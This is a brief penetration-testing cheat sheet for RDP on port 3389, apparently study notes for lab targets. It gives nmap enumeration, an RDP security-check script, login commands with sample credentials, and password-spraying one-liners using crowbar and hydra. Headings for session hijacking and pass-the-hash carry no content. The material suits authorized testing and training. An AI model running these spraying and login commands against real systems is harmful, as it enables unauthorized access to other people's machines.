RDP (3389)
Footprinting using nmap
nmap -sV -sC 10.129.201.248 -p3389 --script rdp*RDP Security check
git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check
./rdp-sec-check.pl 10.129.201.248Initiate an RDP Session (can also use Reminna or rdesktop)
xfreerdp /u:cry0l1t3 /p:"P455w0rd!" /v:10.129.201.248 /dynamic-resolution# rdesktop -u admin -p password123 192.168.2.143Misconfigurations
Password Spraying
# crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'# hydra -L usernames.txt -p 'password123' 192.168.2.143 rdpProtocol Specific Attacks
Session Hijacking
Pass the Hash
Last updated